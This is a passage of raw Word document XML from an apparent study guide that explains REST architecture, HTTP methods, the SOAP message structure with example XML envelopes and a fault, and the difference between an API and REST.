    <w:p w14:paraId="49D13543"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ayered System</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F521E1"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allows for a layered architecture where intermediaries (like proxies, load balancers, gateways) can be used between the client and server to improve scalability and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21AD13"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doesn't need to know whether it's communicating directly with the end server or an intermediary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F980F4"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1DA9B">
          <v:rect id="_x0000_i1954" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4DC5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ful API Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914FACD"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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E64930"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sends an HTTP request to the server using a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GET, POST, PUT, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192918D"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includes a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource URI</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify the resource being requested (e.g., /users/1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6A345"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Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411247C3"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processes the request, retrieves the resource or performs the action, and prepares the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7557D86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may consult databases, external services, or other resources to fulfill the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616F6EF"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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C1C24"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erver send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or the result of an action (e.g., a JSON object, XML document) back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA091C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sponse includes </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>status codes</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicating the outcome of the request (e.g., 200 OK, 404 Not Found, 201 Created).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406681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AC671E">
          <v:rect id="_x0000_i1955" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D36B6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mon HTTP Methods in REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB573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a resource from the server (e.g., GET /users/1 to get user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD6678"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POST /users to create a new user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0D7BE"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PUT /users/1 to update user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F517F2B"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users/1 to delete a user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24888B1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ATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partially update a resource (e.g., PATCH /users/1 to partially update user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C8537"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FCB8A5">
          <v:rect id="_x0000_i1956" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F47A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 Architecture Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108BAB4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 &lt;-&gt; Server (via HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935A63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A358DDF"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quest           Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390AFAD"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10B06FDE"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TP Methods (GET, POST, PUT, DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC06067"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E3F379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urce (e.g., /users, /products)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43A1F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448E78">
          <v:rect id="_x0000_i1957" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA8ACE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Advantages of REST Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD507D"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le</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Due to statelessness, REST APIs scale well as each request is independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505A4F2"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Caching can improve performance and reduce network load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495DA70"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Simplicity</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using standard HTTP methods and statuses makes REST easy to implement and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E4B6"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Interoperability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: REST APIs can be consumed by any client (e.g., browsers, mobile apps, other servers) that can make HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7F4DB" w14:textId="77777777" w:rsidR="00030141"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58" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25291BB9" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="00CE4B95" w:rsidRDefault="000B328B" w:rsidP="000B328B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="_Toc197867625"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does SOAP work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w14:paraId="2818BCBC" w14:textId="731AE949" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B"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imple Object Access Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ow SOAP Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0A3475"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B28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client sends a </w:t>
      </w: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 xml:space="preserve"> to the server, typically over HTTP, although other transport protocols such as SMTP can be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B833F"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OAP request is an XML message that follows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format. It contains the information needed for the request, such as the operation to be invoked and any required parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06B59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The SOAP message is structured in a specific way using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The envelope is the outermost element in the message and encapsulates all parts of the message, including the header and the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65715A6A"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nvelope</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The root element of a SOAP message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A6785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eader</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An optional element that contains metadata (such as authentication, transaction, or routing information). Headers are not always required and are typically used for special processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35626CC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ody</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The mandatory part of the SOAP message, where the actual request or response data is placed. It contains the call to the web service method along with any parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF4E93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Message Format</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A SOAP message typically looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3964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27CA187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0F183BF6"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2FC0F3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84988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805A5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BAB495C"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Id&gt;12345&lt;/web:bookId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A4629"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1D2508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C696A9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532B319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defines the XML namespace and is the root element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A6F0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Header&gt; is optional and can contain header information like authentication or logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002265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quest data or the operation to be invoked (in this case, a getBookDetails operation with a bookId parameter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A6A3B"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erver Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA2C8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hen the server receives a SOAP request, it processes the request, performs the necessary operations (such as accessing a database or invoking a service), and generates a SOAP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB3021"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sponse</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A SOAP response message might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C24B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1299C49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016D614"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771F95B7"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1BF8AE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7C3F7921"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2A16EB5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Title&gt;Introduction to SOAP&lt;/web:bookTitle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E2D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author&gt;John Doe&lt;/web:author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34BF1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         &lt;web:price&gt;29.99&lt;/web:price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7893167D"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3DD2AA7A"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5E2E7E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7CE7841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wraps the response message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3A49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sponse data (in this case, the book details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E629D"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Faults</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A037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f there is an error during the processing of the SOAP request, the server may return a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP fault</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A SOAP fault is an error message structured within the &lt;soapenv:Fault&gt; element, which provides details on the error type and description.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F14C62D" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:firstLine="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xample of a SOAP Fault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B03782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F26294B"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360AFF0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5EE5C49E"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FB4D9E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48178FF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code&gt;soapenv:Client&lt;/faultcode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9C60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string&gt;Invalid bookId provided&lt;/faultstring&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FAEB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1F4ECC6C"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errorCode&gt;400&lt;/errorCode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04FD37"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message&gt;Book ID does not exist in the system&lt;/message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3372E06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5916A1F5"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54502119"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112A7E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63C0315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munication</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32C4E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munication typically happens over HTTP or HTTPS, but SOAP can work over other transport protocols such as SMTP, FTP, or JMS. HTTP is the most commonly used protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9B9E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sends the SOAP message to the server using the POST method, and the server returns a response to the client with the required information or a fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C90E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0CA0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SOAP can be used with various security protocols such as </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WS-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for handling encryption, authentication, and authorization, which ensures that sensitive data can be securely transmitted over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783915C" w14:textId="77777777" w:rsidR="000B328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0D8C5">
          <v:rect id="_x0000_i1959" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C6B4F"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ummary of the SOAP Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D9D52"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sends a SOAP request (an XML message) to the server, which includes the operation to be invoked and any necessary parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69695B15"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processes the request and executes the specified operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D81E0F"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generates a SOAP response, which contains the result of the operation or an error message (SOAP fault).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305C85E"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receives the SOAP response and processes the result or handles any errors returned in the SOAP fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE48A5A"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SOAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C6E1F"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latform and Language Independence</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SOAP can work across different platforms and programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539636B"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 It supports WS-Security, ensuring secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7D6A3"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ndardized</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SOAP is a widely accepted standard for web services, especially in enterprise environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E21217"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liability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It supports message reliability through the WS-ReliableMessaging specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DCE541" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328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essence, SOAP is a protocol for exchanging structured information in a standardized way using XML messages over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F02CD" w14:textId="2397C17A" w:rsidR="000B328B"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60" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66FD7E" w14:textId="24700B5B" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="006C2A4C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc197867626"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between API and REST</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
    </w:p>
    <w:p w14:paraId="10DFA92C" w14:textId="202C4037" w:rsidR="00231500" w:rsidRPr="00CE4B95"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CE4B95" w14:paraId="41D78C64" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F69C25E"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REST (Representational State Transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="093D1DC8" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0531A03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n architectural style used for designing networked applications using stateless communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="36CCF264" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08AC283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specifically use HTTP as the communication protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="48F3983D" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F7BA9FC"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ncept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76352992"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 specific type of API that follows a set of constraints and principles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="787DF213" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44242D4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typically uses JSON or XML as the data format for communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="08BEAA5F" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12BCCDE6"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CE4B95" w14:paraId="45493771" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159AA9D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trictly follows constraints like statelessness, client-server architecture, uniform interface, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="6A61398A" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E0B608"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typically synchronous and follows the request-response model.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="747FA455" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EE9549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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485E656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CE4B95"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61" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54229734"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Key Takeaways:</w:t>
